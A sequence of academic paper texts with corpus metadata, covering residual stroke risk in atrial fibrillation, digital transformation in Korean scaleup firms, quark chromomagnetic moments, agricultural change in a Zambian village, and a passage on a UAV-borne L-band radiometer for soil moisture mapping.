It is recommended that the management of patients with AF includes a holistic approach by combining patient education, lifestyle modification, psychosocial management and strategies that promote medication adherence. 8 Hence, I propose that the management of residual stroke risk in AF should incorporate the implementation of an integrated, multidisciplinary care strategy with clear communication between healthcare professionals and a structured approach (Table 4). In this regard, the importance of appropriate administration of dose-adjusted anticoagulation therapy in AF should not be overlooked because the use of off-label doses has been linked to poorer outcomes. 85,86 The detection and management of modifiable risk factors associated with AF, such as hypertension, coronary artery disease, heart failure, diabetes, hyperthyroidism, obesity and valvular heart disease, must also be prioritised. An in-depth review of this has been published elsewhere. 87 Moreover, other sources of stroke risk should be considered, because some may have a major effect on overall management strategies. 24 Given the limited evidence in this area, the decision to pursue specific treatment options such as catheter AF ablation and LAA occlusion to minimise residual stroke risk in AF should be individualised.
Conclusion
Residual stroke risk among anticoagulated patients with AF represents a real challenge in the clinical environment. Presently, the identification and subsequent management of high-risk individuals are poorly explored topics. Future studies are needed to define risk factors of residual stroke in AF and determine the effects of specific treatments in this patient cohort. | 2021-11-07T16:15:01.389Z | 2021-10-01T00:00:00.000 | {
"year": 2021,
"sha1": "512a357f0cc8a861e3ea96c967a1a5ea7d932389",
"oa_license": "CCBYNC",
"oa_url": "https://doi.org/10.15420/aer.2021.34",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "0434d1c76e547a32a911da061650c51ac980e468",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
245788105 | pes2o/s2orc | v3-fos-license | Exploratory Study on Digital transformation: Capabilities and Expected Performances
Nowadays many firms face the macro-level changes called digital transformation, and research on it has increased drastically since 2014. In response to this emerging phenomenon, this study explores how firms prepare for digital transformation and what they expect from it. More specifically, based on a survey of 439 Korean scaleup firms (high-growth firms), we propose concepts for the capabilities necessary for digital transformation and for the performance improvements expected from it. Our study illustrates how a firm's perceptions of those concepts vary with firm size and industry type. Additionally, our study offers a clue to the 'digital divide' that can potentially threaten the survival of numerous firms.
Introduction
In recent years, the business world has encountered macro-level changes sourced from digital transformation. While digital transformation is not a completely new topic for many entities across different areas, the body of research on it has grown rapidly since 2014 (see Figure 1, Google Trends). However, as digital transformation comes with unprecedented changes and convergence across various technological domains and industrial sectors, it can be a double-edged sword for both incumbents and new ventures. Although it can potentially provide diverse and constructive collaboration opportunities to many firms (Luo, 2021), it can also threaten the business of many firms, as existing technological standards and business systems will be drastically changed or challenged (Oh & Rhee, 2008).
In response to this mixed expectation of digital transformation, this study explores how firms currently view digital transformation in terms of preparation and desirable outcomes. More specifically, using data on Korean high-growth firms, we first present survey results showing what types of capabilities those high-growth firms perceive as key to coping with the changes sourced from digital transformation and what types of firm performance they anticipate achieving. Then, we shift our attention to important firm-specific characteristics, firm size and industry type, that can matter when firms adopt macro-level changes (Li et al.), and provide a comparative analysis. The results indicate that firms' perceptions of and preparations for digital transformation vary with firm-specific characteristics. We also find that some firms might suffer from a digital divide (a bipolarization of digital capability).
Fig. 1. Interest in Digital Transformation
Source: Google Trends.
Selection of capabilities and performance
To design the survey, we selected the following three capabilities: (1) business capability, which refers to a firm's ability in task management, process improvement and data management; (2) digital capability, defined as a firm's technological capability in programming, software development and data analysis; and (3) soft capability, which refers to a firm's capability in problem-solving, collaboration and creativity management. These capabilities are necessary to achieve innovation (Teece, 1986, 2018). The reason we focus on these three capabilities is that a firm's ability to cope with macro-level changes ultimately depends on how the firm develops necessary technologies, how it applies those technologies to real business activities and how the people in the firm manage these transitional processes. Regarding the anticipated performance that firms ultimately aim to achieve, we developed three performance dimensions: (1) profitability growth, (2) new product development and (3) new partnerships.
Sample collection
We implemented a survey based on a list of scaleup firms in Korea. To collect the sample firms, we first drew on the Korea Enterprise Data (KED) database subscribed to by the Science and Technology Policy Institute (STEPI) and gathered the initial sample of firms that had shown a 20 percent increase in sales with more than 10 employees during the period 2016-2018. This initial sample included 3,391 scaleup firms. We then sent an email survey to all these firms, and a total of 439 responses were received, for a response rate of 13%. We classified those 439 firms along two dimensions: firm size and industry. Regarding the former, 86 firms (20%) were large firms, while 353 firms (80%) were small and medium-sized enterprises (SMEs). Regarding the latter, manufacturing industries comprised 44% of the sample (194 firms), while non-manufacturing firms, such as service firms, made up 56% of the sample (245 firms). We designed the survey questionnaire by referring to the 2019 ScaleUp Survey of the ScaleUp Institute, a UK private-sector, not-for-profit company.
Analysis
Collected data were analyzed with a focus on the following four matters: (1) the importance of digital transformation and preparations for it; (2) the expected changes digital transformation would bring to the industry and main products; (3) the capabilities necessary to prepare for digital transformation; and (4) the anticipated performance improvement from digital transformation. Digital transformation is a macro-trend phenomenon that affects all industries and many firms, but individual firms may have different views depending on their characteristics or the industry to which they belong. Therefore, this study classifies responses by firm size and industry characteristics for each of the aforementioned matters. Table 1 shows firms' perceptions of the "capabilities considered important to prepare for digital transformation" by firm size and industry type. For all capability types, small and medium-sized firms show more than 50% 'Neutral' views and a low share of 'Positive' views, indicating that small and medium-sized firms take a pessimistic perspective on the need for those capabilities. Similarly, compared with manufacturing firms, non-manufacturing firms hold more 'Neutral' and 'Negative' views of the value of each capability. Table 2 shows firms' expectations of performance improvement through digital transformation. Compared with small and medium-sized firms, large firms show more optimistic and less pessimistic views on each performance dimension. Similarly, compared with non-manufacturing firms, manufacturing firms show more optimistic views on each performance dimension. After exploring firms' general perspectives on each dimension of capability and performance, we conducted sets of OLS regressions to gain further insight into the relationship between those capabilities and performances. Table 3 shows summary statistics and indicates that the dimensions of capabilities and performances are highly correlated; hence, we mainly focus on the direct relationship between each capability and each performance. Tables 4-7 show the results of the OLS regressions. As expected, while each capability has a significant and positive relationship with each anticipated performance, Table 5 shows an interesting exception: in the case of large firms, no capability has a significant impact on new product development. This may indicate that large firms view digital transformation as an instrument to renovate business models and networks rather than merely to develop new products. The findings presented in Tables 4-7 do not necessarily mean that the impact of those capabilities on the three types of performance is confirmed; rather, they reflect how people in firms perceive or believe in the association between capabilities and performances. However, it is still meaningful and valid to understand how various firms interpret the situations and changes brought by digital transformation. We conducted an additional analysis to explore in more detail how firm size and industry type jointly influence the relationship between capabilities and expected performance. While the main effects of the individual capabilities on each expected performance are mostly significant and positive, the full model yields more interesting findings. (We do not report the main effects of the individual capabilities here due to space limits.) Table 8 shows that large manufacturing firms and small and medium-sized non-manufacturing firms exhibit some statistically significant results.
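A minimal sketch of the regression design described above follows. The `survey` data frame, the column names, and the treatment of the Likert responses as continuous scores are all assumptions, not the study's actual code.

```python
# Hedged sketch of the OLS specifications: each expected-performance score
# regressed on the three capabilities, with firm-size and industry
# interactions for the full model (hypothetical survey columns).
import statsmodels.formula.api as smf

for outcome in ["profitability", "new_product", "new_partnership"]:
    full = smf.ols(
        f"{outcome} ~ (business_cap + digital_cap + soft_cap)"
        " * large_firm * manufacturing",
        data=survey,  # hypothetical DataFrame of the 439 responses
    ).fit()
    print(outcome, full.params.round(3))
```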
Interestingly, in the case of large manufacturing firms, business capability and firm profitability are negatively related. This finding does not mean that business capability for digital transformation leads firms to experience lower profitability. Instead, it implies that people in large manufacturing firms do not view business capability as a key determinant of profitability in the era of digital transformation; they do, however, consider digital capability a positive and key determinant of it.
Discussion
Our study provides unique insights in several ways. First, we offer useful concepts for evaluating the capabilities for, and expected outcomes of, digital transformation. In our survey, three important capabilities for digital transformation (business, digital and soft capabilities) and three expected performance improvements (profitability, new product development and new partnerships) are addressed. More importantly, our study demonstrates how those concepts are perceived differently by individual firms. While large firms and manufacturing firms show a more positive perspective on digital transformation in terms of both capabilities and expected outcomes, those firms also demonstrate some interesting patterns, such as a negative or null effect (in fact, perceived expectation) of business capability on performance.
More importantly and interestingly, by investigating the firm size effect and the industry effect, our study offers a clue to the 'digital divide' that can potentially threaten the survival of the numerous firms that fail to adopt the skills and capabilities relevant to preparing for digital transformation. As digital transformation will come with an unprecedented degree of convergence across industrial sectors, the negative effect of the digital divide can create tremendous inequality among firms (e.g., large firms vs. small firms). This calls for policy makers to consider policy efforts for balanced development. | 2022-01-07T16:16:01.044Z | 2022-01-01T00:00:00.000 | {
"year": 2022,
"sha1": "f08b17ea4e912ce36aa0a5fb580276dccfe6c26a",
"oa_license": "CCBY",
"oa_url": "https://www.shs-conferences.org/articles/shsconf/pdf/2022/02/shsconf_ies2021_01014.pdf",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "85e31d7e4c0508ce7a0ed8144dee7288e562d386",
"s2fieldsofstudy": [
"Business"
],
"extfieldsofstudy": []
} |
118493341 | pes2o/s2orc | v3-fos-license | Light quark mass effects in the chromomagnetic moment
We present the three-loop QCD corrections to the quark chromomagnetic moment including two different nonzero masses. This is a necessary ingredient to obtain the corresponding corrections to the chromomagnetic coefficient in the Heavy Quark Effective Theory (HQET) Lagrangian.
Introduction
The anomalous magnetic moments of the electron and the muon are among the most precisely measured observables in particle physics. Comparing the theoretical and experimental predictions for the muon magnetic moment, there is currently a 3.4σ discrepancy [1] with the Standard Model (SM), which makes this observable very interesting at the moment. We calculate finite light quark mass contributions to the chromomagnetic moment of quarks and obtain, as a byproduct, the corresponding corrections to the above-mentioned observables, confirming the results of Refs. [2,3,4]. Another byproduct of our calculation is the anomalous magnetic moment of heavy quarks, the bottom quark in particular, where we include the effect of a finite charm quark mass. The magnetic moment of quarks has not yet been measured experimentally; however, for the bottom and the lighter quarks there are upper limits from LEP1 data [5]. Due to the lack of space in these proceedings, we will present analytic results for this observable in Ref. [6].
Whereas the anomalous magnetic moments of fermions are physical observables, the chromomagnetic moment is not. Nevertheless, it plays a crucial role in HQET, where it enters the matching coefficient of the chromomagnetic interaction operator [7]. The one-loop correction to the chromomagnetic moment has been obtained in Refs. [8,9]. In Refs. [10,11], the two-loop calculation has been performed, and light quark mass effects at this order have been obtained in Ref. [12]. An estimate of higher-order corrections was then given in Ref. [13], and the three-loop correction with one mass scale was finalized in Ref. [7]. In the latter, the aforementioned matching coefficient of HQET is almost trivially obtained from the chromomagnetic moment. In the case with two mass scales, additional diagrams have to be calculated in the effective theory to match it to full QCD. We will present the matching coefficient in Ref. [6] and restrict the following discussion to the chromomagnetic moment. The results given in these proceedings have been published in Ref. [14].

Fig. 1: Sample three-loop diagrams. Note that we use the background field method for the external gluon.
Calculation of the chromomagnetic moment
To calculate the chromomagnetic moment we have to consider the quark-anti-quark-gluon vertex in the background-field formalism of QCD. We consider the effect of a nonzero light quark mass on this quantity at the three-loop level. Sample diagrams which have to be calculated are depicted in Fig. 1. When both the quark and anti-quark are on the (renormalised) mass shell and have physical polarisations, the vertex $\Gamma^\mu_a = \Gamma^\mu t^a$ can be decomposed into two form factors,

$$\Gamma^\mu = F_1(q^2)\,\gamma^\mu + \frac{i}{2 M_h}\,\sigma^{\mu\nu} q_\nu\, F_2(q^2)\,,$$

where $M_h$ is the heavy quark mass, $q = p_1 - p_2$ is the gluon momentum and $p_1$ and $p_2$ are the momenta of the quark and anti-quark, respectively. The anomalous chromomagnetic moment is given by $\mu_c = Z_2^{\rm OS} F_2(0)$, where $Z_2^{\rm OS}$ is the quark wave function renormalisation constant in the on-shell scheme. The total quark colour charge is given by $Z_2^{\rm OS} F_1(0) = 1$. Thus, $F_1(0)$ is the inverse of the on-shell wave function renormalisation constant, which has been calculated to three loops including light quark masses in Ref. [15]. Therefore, the calculation of $F_1(0)$ provides a strong check on the correctness of our result.
All Feynman diagrams are generated with QGRAF [16], and the various topologies are identified with the help of q2e and exp [17,18]. In the next step, the reduction of the various functions to so-called master integrals has to be achieved. For this step we use the Laporta method [19,20], which reduces the three-loop integrals to 27 master integrals. We use the implementation of Laporta's algorithm in the program Crusher [21]. It is written in C++ and uses GiNaC [22] for simple manipulations, such as taking derivatives of polynomial quantities. In the practical implementation of the Laporta algorithm, one of the most time-consuming operations is the simplification of the coefficients appearing in front of the individual integrals. This task is performed with the help of Fermat [23], for which a special interface has been used (see Ref. [24]). The main features of the implementation are the automated generation of the integration-by-parts (IBP) identities [25], a complete symmetrisation of the diagrams, and the possibility to make use of a multi-processor environment. As we need the form factors at zero momentum transfer, all occurring master integrals are on-shell propagator-type integrals. They have been calculated using different analytical and numerical methods; see Refs. [15,26] for details. To calculate the colour factors, we have used the program described in Ref. [27].
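As a purely illustrative aside (ours, not part of the original computation), the SU($N_c$) colour factors quoted in the results below can be evaluated with a few lines of Python:

```python
# SU(N_c) colour factors in the normalisation T_F = 1/2 used below.
N_c = 3                              # number of colours in QCD
T_F = 0.5                            # generator trace normalisation
C_F = (N_c**2 - 1) / (2 * N_c)       # fundamental Casimir -> 4/3
C_A = N_c                            # adjoint Casimir -> 3
N_F = N_c                            # dimension of the fundamental rep.

print(f"C_F = {C_F}, C_A = {C_A}, T_F = {T_F}, N_F = {N_F}")
```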
Results
We write the chromomagnetic moment as a perturbative expansion in the strong coupling constant, where $\gamma_E = 0.57721\ldots$ is the Euler–Mascheroni constant and $\alpha_s$ denotes the strong coupling constant with $n_f = n_l + n_m + n_h$ active flavours ($n_l$, $n_m$ and $n_h$ are the numbers of massless, light and heavy quarks, respectively). In practice, $n_m$ and $n_h$ will be equal to one, but we keep them explicit in our results in order to track the various classes of diagrams. We further decompose the three-loop contribution containing light quarks with nonzero mass into its colour structures, where $C_F = (N_c^2-1)/(2N_c)$ and $C_A = N_c$ are the eigenvalues of the quadratic Casimir operators of the fundamental and adjoint representations of the SU($N_c$) colour group, respectively. In the case of QCD we have $N_c = 3$ and $T_F = 1/2$. The dimension of the fundamental representation is given by $N_F = N_c$. The symmetrised trace of four generators in the fundamental representation is denoted by $d^{abcd}$. We present our results at the renormalisation scale $\mu = M_h$, where $M_h$ is the pole mass of the heavy quark. The nonzero pole parts of the various contributions are given explicitly in Ref. [14]. The contributions to $C_{AAM}$ and $C_{FAM}$ are presented as a series expansion up to third order in the quark mass ratio $x = M_m/M_h$, where $M_m$ is the pole mass of the light quark. The results for the finite parts of the different colour structures are given in graphical form in Fig. 2 for $0.2 < x < 0.4$, the range relevant for charm mass effects in the chromomagnetic moment of the bottom quark. The mass dependence on the bottom quark in the chromomagnetic moment of the top quark can safely be neglected, and the results at $x = 0$ from Ref. [7] can be used. The analytic results, including the renormalisation scale dependence, will be given in Ref. [6]. | 2009-05-31T03:13:09.000Z | 2009-05-31T00:00:00.000 | {
"year": 2009,
"sha1": "c1628090eacc894fa96adb8151f1e02546e63030",
"oa_license": null,
"oa_url": null,
"oa_status": null,
"pdf_src": "Arxiv",
"pdf_hash": "c1628090eacc894fa96adb8151f1e02546e63030",
"s2fieldsofstudy": [
"Physics"
],
"extfieldsofstudy": [
"Physics"
]
} |
203164714 | pes2o/s2orc | v3-fos-license | Agricultural Change and Unstable Production over a 20-year Period in a Central Zambian Village ─ Under the Penetration of a Market Economy and the Farmers' Response ─
In Zambia, the development of the market economy and free trade has affected agricultural production and the rural economy since the 2000s. This paper examines changes in farming from both technological and economic viewpoints. The focus is on maize production and small-scale irrigation farming using small engine pumps in the wetlands, in addition to modern inputs such as fertilizer, seeds and chemicals. Farmers have attained crop diversification, two maize crops a year, and high rates of farm production. However, high-cost agricultural production may increase the vulnerability of those farmers who cannot afford to pay for the inputs.
Introduction
In 1991, Zambia became a multiparty democracy, representing a shift in the political and economic milieu from a socialist, government-led economy to a liberalized market economy. Unfortunately for Zambia, its economy declined dramatically in the 1990s. However, since 2001, under the "New Deal Policy" of the previous president, President Mwanawasa, the economy has recovered and grown. Such a high rate of economic growth has resulted in a growing demand for food. This paper explores the changes in agricultural production from both technological and economic viewpoints. The focus is on maize production (with maize as both a staple food crop and a cash crop) and small-scale irrigation farming using small engine pumps in the wetlands (dambo).
The data used come from a village where field surveys have been conducted for almost 20 years (1992–2010). In the mid-2000s, farmers from this village began to use small engine pumps (hereafter, engine pumps). The engine pump, as an agricultural investment, is one of the most expensive assets for a small-scale farmer. As will be discussed in greater detail later in the paper, these farmers have responded positively to the economic incentives presented by the greater opportunities that have arisen from the development of the market economy.
The entrance of the village (where a small town is positioned) is located about 90 km north of Lusaka. The land area of the village covers approximately 5–6 km², positioned approximately 3 km southeast of the entrance at its closest point and 8 km away at its innermost point in a straight line. The small town, which is expanding, has many stalls selling a variety of crops, including tomatoes and watermelons.
Prior to the early 2000s, there were no shops in the village, but now there are shops selling a range of goods including seeds, chemical fertilizers, and agrochemicals. Before we analyze the small-scale irrigation farming practices of the village, we should discuss large-scale irrigation farming, particularly the center-pivot method.
-1 Farm Inputs
As already mentioned, the small town near the entrance of the village has experienced recent expansion, as documented by Google Earth satellite photos. One shop made an agency contract with Pioneer, a company that sells seeds for a variety of crops.
The owner of the shop received training from Pioneer on how to advise farmers on the use of weed killer, as well as on selling seeds.
-2 Agricultural Products
Recent observations have shown that there is now a greater range of agricultural products in the markets alongside the tarmac road and even on the village farms. At the end of the 1990s, the main crops for sale in the village were maize, tomatoes, watermelon, Chinese rape, and a small number of other crops. In addition to these traditional crops, others are now being grown, including dry-season maize, popcorn, sweet potatoes, cowpeas, beans, impua, eggplant, okra, leek, onion, green pepper, cabbage, Chinese cabbage, squash, and butternuts. Since the mid-2000s, the demand for food has grown, particularly from mine workers.
Introduction of the Small Engine Pump
Since the mid-2000s, the number of farmers using small engine pumps has increased (Table 1). The increase in fertilizer use can be attributed to the intensification of maize production (Fig. 3). Of the 17 engine-pump users, only four were using FISP (the Farmer Input Support Programme).
Season
As already mentioned, it is easy for farmers with engine pumps to grow maize (green maize) during the dry season; indeed, they can grow two crops a year. While this is a revolutionary change, it also carries risks, as discussed later. In addition, farmers are working on a trial-and-error basis regarding green maize production because it is a relatively new practice with many considerations (e.g., weather conditions, water resource availability, and petrol prices). There are also further risks, including attacks on fields and grazing animals eating the maize.
-3 Sale of Crops
Annual crop sales for engine-pump farmers were recorded in 2010. There is also large-scale farming close to this area, but at a lower elevation. There is no scientific evidence to support a causal relationship between the engine pumps and the gardens that are now in disuse.
-4 Production Costs of Tomatoes
One of the farmers offered an alternative reason why the area was no longer used as a garden, one that was not linked to the use of engine pumps.
After the liberalization and privatization of the Zambian economy, Zambia has enjoyed a copper boom. Since the beginning of the 2000s, the price of copper has skyrocketed worldwide, and the agricultural market is expanding in response to a greater demand for domestic agricultural products. Furthermore, President Mwanawasa's "New Deal Policy" remains in place and still provides affordable subsidized inputs to farmers.
With regard to the agricultural sector, we can confirm high economic growth and the development of the market economy in rural areas, even in those near the capital, Lusaka. Farmers can now easily purchase farming inputs, such as improved and varied seeds, chemical fertilizers, and agrochemicals, at the small but growing town near the village. Agricultural diversification in terms of production is also occurring gradually.
In contrast, the increasing use of expensive inputs may bring about high-cost farming and, consequently, may result in a shortage of funds.
There are three ways to prevent such high demands on available funds: 1) increase the use of farm-made inputs, such as animal dung, instead of expensive inputs such as fertilizers; 2) use institutional credit, such as government- or NGO-assisted and subsidized credit programs; and 3) use private moneylenders. It is important to create new systems, like leveraged finance, to multiply gains and losses.
Serious problems will ensue if the income differentials between owners and non-owners, seen for example in land (dambo) ownership and physical capital (engine pumps), continue to grow.
There are signs in the village of the increasing presence of capitalism. For example, two people with salaried incomes began to grow maize on a large rented property in the village. They were not traditional farmers and rented the farmland from the villagers. In addition, they hired tractors to plow the maize fields.
Thus, the development of a market economy may produce an unstable rural society. (Accepted, 2014.12.18) | 2019-08-17T08:28:35.226Z | 2015-01-01T00:00:00.000 | {
"year": 2015,
"sha1": "305001ff4b1203f49202ac42132dc6b79c78e7bc",
"oa_license": null,
"oa_url": "https://www.jstage.jst.go.jp/article/tga/66/4/66_255/_pdf",
"oa_status": "GOLD",
"pdf_src": "ScienceParsePlus",
"pdf_hash": "5d05bb8a20276739a5e34a830da714e881fa40ad",
"s2fieldsofstudy": [
"Economics",
"Agricultural And Food Sciences"
],
"extfieldsofstudy": [
"Economics"
]
} |
16081205 | pes2o/s2orc | v3-fos-license | Design and first results of a UAV-borne L-band radiometer for multiple monitoring purposes. Remote Sens
UAV (Unmanned Aerial Vehicle) platforms represent a promising opportunity for the deployment of a number of remote sensors. These vehicles are a cost-effective alternative to manned aerial vehicles (planes and helicopters), are easy to deploy due to the short runways needed, and allow users to meet the critical spatial and temporal resolution requirements imposed by the instruments. L-band radiometers are an interesting option for obtaining soil moisture maps over local areas with relatively high spatial resolution for precision agriculture, coastal monitoring, estimation of fire risk, flood prevention, etc. This paper presents the design of a light-weight, airborne L-band radiometer for deployment in a small UAV, including the hardware and the specific software developed for calibration, geo-referencing, and soil moisture retrieval. First results and soil moisture retrievals from different field experiments are presented.
Introduction
The interest of the scientific community in the remote measurement of geophysical parameters, such as soil moisture (SM) or sea surface salinity (SSS), has increased in recent years, and much effort has been spent developing research instruments. This has been done mainly by the European Space Agency (ESA), with MIRAS/SMOS [1], and the National Aeronautics and Space Administration (NASA), with the AQUARIUS/SAC-D [2,3] and SMAP [4] missions. These space-borne radiometers have been optimized to measure the aforementioned variables globally, at mesoscale resolution, with a short revisit time (~3 days): the pixel size is ~100 km for a 0.1 psu SSS accuracy, or ~50 km for a 4% SM accuracy. However, these systems are not adequate for regional or local applications, where higher resolution imagery is required. Airborne microwave radiometers flying at low altitudes can fill this gap; they can improve the spatial resolution to tens of meters without virtually any revisit time restrictions. Furthermore, these platforms are less sensitive to atmospheric effects. The SLFMR aboard a de Havilland Beaver [5] and MIRAMAP's radiometers [6] are examples of airborne radiometers. In this context, small unmanned aerial vehicles (UAVs) have been found to be ideal platforms for this kind of remote sensing application [7], because they are easy to deploy, more flexible, and offer a high level of re-configurability.
This work describes a radiometer system that performs soil moisture mapping from low-altitude small UAV platforms. The paper is organized as follows: Section 2 presents an introductory overview of the system. Section 3 analyzes the onboard airborne radiometer. The software processor is presented in Section 4; the processor covers radiometer calibration, data geo-referencing and representation, data interpolation, and SM retrieval algorithms. Section 5 is devoted to the analysis of soil moisture measurements. Finally, Section 6 summarizes the main conclusions of this paper.
System Description
There are a number of restrictions in the design process for a microwave radiometer and its platform. Assuming use in precision farming, an absolute accuracy better than ≈10 K is desired to determine SM with errors lower than 4%. Additionally, a spatial resolution between 30 and 150 m, while flying at altitudes of up to 300 m, is desirable.
The use of UAV platforms to carry remote sensors imposes strong constraints on the size, weight, and power consumption of the sensors. Moreover, due to the strong vibrations induced by the UAV engine, extra effort is required to increase the robustness of the instrument. These vibrations can exceed 6 g for gasoline-engine-powered radio-controlled aircraft, so special care must be taken throughout the system design process.
The main parts of the system deployed on the UAV platform are the L-band radiometer, including the antenna, a Global Positioning System (GPS) receiver, an Inertial Motion Unit (GPS-IMU), and the datalogger. Different UAV platforms have been used, all of them with a 2.5 m wingspan and 2 m length (Figure 1). These UAVs are able to fly at altitudes of up to 400 m, with cruise speeds between 25 and 45 m/s and an endurance of up to 20 min, while carrying a payload of up to 3.5 kg.
The platform is provided with the GPS-IMU for the purpose of geo-referencing the collected radiometric data. The radiometer's output signal, the attitude (roll, pitch, and yaw), the altitude, and the aircraft speed (v_x, v_y, and v_z) are recorded by the onboard dataloggers at a sampling rate of 50 samples per second for later data processing.
Airborne L-band Radiometer
A single-polarization, nadir-looking Dicke radiometer was selected and implemented due to its simplicity and sufficient stability when thermally stabilized. The system was designed to require external periodic calibration only at the beginning and end of each flight (≥20 min).
An important issue to take into account is the antenna. At L-band, the antenna dimensions are comparable to the size of the UAV itself if a narrow beamwidth is desired (e.g., less than 25° in both planes). Furthermore, the antenna has to be specifically designed to reduce its influence on the UAV aerodynamics, while preserving the desired performance for radiometric applications. The designed antenna (Figure 2a) is a flat hexagonal 7-patch array with a 22° beamwidth in both dimensions [8]. The measured gain, directivity, and radiation ohmic efficiency of this antenna are 15.88 dB, 16.03 dB, and 96.5%, respectively. The effect of variations in the antenna ohmic losses due to temperature fluctuations is minimized by incorporating a thermal control attached to the antenna ground plane.
The Airborne RadIomEter at L-band (1.4 GHz) (ARIEL) block diagram is shown in Figure 3. The heterodyne receiver is divided into three main blocks: the RF front-end, the down-converter, and the detection block. The RF front-end (1,400 MHz to 1,427 MHz) includes the Dicke switch, which alternates the detected power between the signal from the antenna and that from a matched load. This signal is properly filtered, amplified, and down-converted to baseband, where it is detected using a true rms-detector (output voltage proportional to the signal's standard deviation), followed by a square-law amplifier. Finally, the signal is synchronously demodulated, low-pass filtered, and conditioned before the analog-to-digital conversion process. The radiometric sensitivity $\Delta T$ for a balanced Dicke radiometer is [10]
$$\Delta T = \frac{2\,(T_{REF} + T_{REC})}{\sqrt{B\,\tau}},$$
where $T_{REF}$ = 315 K is the physical temperature of the reference load, $T_{REC}$ ≈ 790 K is the receiver's noise temperature, $B$ ≈ 30 MHz is the system's noise bandwidth, and $\tau$ is the integration time.
The maximum integration time is determined by the minimum dwell time according to
$$\tau_{max} = \frac{FP_{min}}{v_{max}} = \frac{2\,h_{min}\tan(BW/2)}{v_{max}},$$
where $FP_{min}$ is the smallest footprint, $BW$ is the antenna beamwidth, $h_{min}$ is the minimum flight height, and $v_{max}$ is the maximum flight speed. With these parameters, the theoretical radiometric resolution is $\Delta T$ = 1.27 K for an integration time of $\tau$ = 100 ms.
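As a quick numerical cross-check (ours, not from the paper), the sensitivity expression above can be evaluated with the stated system parameters; it reproduces the quoted resolution of about 1.27 K:

```python
import math

T_REF = 315.0   # reference load physical temperature [K]
T_REC = 790.0   # receiver noise temperature [K]
B = 30e6        # noise bandwidth [Hz]
tau = 0.100     # integration time [s]

# Balanced Dicke radiometer sensitivity
delta_T = 2.0 * (T_REF + T_REC) / math.sqrt(B * tau)
print(f"Delta T = {delta_T:.3f} K")   # -> Delta T = 1.276 K
```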
The radiometer was implemented using commercial off-the-shelf components. The radiometer front-end was integrated in a 100 × 60 × 15 mm monoblock box (Figure 4). The total weight, including the batteries, the antenna, and its radome, is less than 3 kg. Including the thermal control of the radiometer, the total power consumption of the system is less than 10 W, which facilitates the use of light-weight lithium-polymer batteries as the main power supply.
ARIEL Soil Moisture Retrieval Processor
A specific software processor has been developed to obtain soil moisture maps from the radiometric measurements. The input data files (GPS, IMU, attitude, and raw radiometric data) are selected from a specific graphical user interface (GUI), where the radiometric calibration procedure is defined. This radiometric data calibration is performed before, after, or both before and after the flight, according to an established protocol. Figure 5a shows this calibration process. The calibration is based on the selection of the intervals in the raw data where the hot or cold loads were measured.
Two independent dataloggers were used: one for the GPS, and the other for the inertial and radiometric data. To synchronize their data, cross-correlation techniques were applied to the altitude information from the GPS and the barometer (Figure 5b). As shown in Figure 6a, histograms can also be plotted to detect relevant information, such as intervals of interest, by extracting the desired ranges of antenna temperatures or aircraft height. Interesting parameters to display are the antenna temperature and soil moisture maps in time intervals. The flight trajectory can be illustrated together with the corresponding antenna footprints plotted along the ground track (Figure 6b). The processor includes attitude and altitude filters to limit the range of valid incidence angles and to eliminate Sun glints at high banking angles, radio frequency interference (RFI) peaks, and potential recording errors of the dataloggers. Finally, in order to fully cover a specific area (typically 1 km × 1 km) with the UAV flying at low altitudes (under 300 m), the flight plan is designed in such a way that several overpasses at different heights (i.e., with different spatial resolutions) are obtained. In order to merge all the collected information, each footprint has to be properly weighted with the antenna's radiation pattern. Therefore, interpolation techniques have been developed to obtain images with soil moisture or antenna temperature information (Section 4.1.3). These images are then geo-referenced and linked to a map using Keyhole Markup Language (KML) [11] files that can be superimposed on Google Earth maps for better interpretation.
Algorithm Description and Procedures
The soil moisture retrieval algorithm proceeds as follows:
• Raw data resampling.
• Ground projection of the antenna footprint, taking into account the attitude and position of the platform.
• Spatial interpolation.
The algorithm is described step by step in the following sections.
Data Resampling
The GPS's largest errors are in the vertical direction. A barometric sensor is used to correct this information and to refer all heights to ground level, so as to properly compute the antenna footprints. In order to geo-reference the radiometric data, it is necessary to synchronize the barometric altimeter, the GPS, and the radiometric data, since they are acquired at different sampling frequencies and by different dataloggers.
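A minimal sketch of this synchronization step, assuming two equal-length, equal-rate altitude records (the function below is our illustration, not code from the paper):

```python
import numpy as np

def find_lag(gps_alt, baro_alt):
    """Estimate the sample offset between two altitude records from
    the peak of their normalized cross-correlation."""
    g = (gps_alt - gps_alt.mean()) / gps_alt.std()
    b = (baro_alt - baro_alt.mean()) / baro_alt.std()
    xc = np.correlate(g, b, mode="full")
    return int(np.argmax(xc)) - (len(b) - 1)

# Toy check with a synthetic signal delayed by 7 samples
x = np.random.default_rng(0).normal(size=500)
y = np.concatenate([np.zeros(7), x[:-7]])   # y lags x by 7 samples
print(find_lag(x, y))                        # -> -7 (x leads y)
```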
Radiometric Calibration
The radiometer's raw data are converted into antenna temperatures through the radiometric calibration. In a Dicke radiometer, the relationship between the output voltage, $v_o$, and the antenna temperature can be expressed as [10]
$$v_o = a\,(T_{REF} - T_A) + b,$$
where $T_{REF}$ is the temperature of the reference load (measured with a thermometer), $T_A$ is the antenna temperature, and $a$ and $b$ are gain and offset constants to be determined during the absolute calibration with the hot–cold method [12]. A thermally isolated microwave absorber placed just in front of the antenna is used as a hot load, and pointing the antenna to the sky provides the equivalent of a cold load.
In case of temperature drifts during the flight, linear behavior is assumed between the two hot/cold load calibrations performed just before and after the flight. In this case, the calibration parameters can be determined as
$$a(t) = a_b + \frac{a_f - a_b}{t_f - t_b}\,(t - t_b), \qquad b(t) = b_b + \frac{b_f - b_b}{t_f - t_b}\,(t - t_b),$$
where $t$ is the time and the subscripts $b$ and $f$ denote before and after the flight, respectively. Finally, the time-dependent coefficients $a(t)$ and $b(t)$ are used with $T_{REF}$ to compute the calibrated antenna temperature at each sample. If all in-field calibrations fail, a laboratory calibration with constant coefficients measured in the anechoic chamber can be used. For an integration time of $\tau$ = 100 ms, the measured calibration standards have standard deviations of $\sigma_{hot}$ = 0.0045 V and $\sigma_{cold}$ = 0.0052 V, which translate into sensitivities of $\Delta T_{hot}$ = 0.84 K and $\Delta T_{cold}$ = 1.22 K; these values are in agreement with the theoretical predictions (Section 3).
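A minimal sketch of this two-point calibration with linear drift correction, with all numeric values illustrative rather than taken from the paper:

```python
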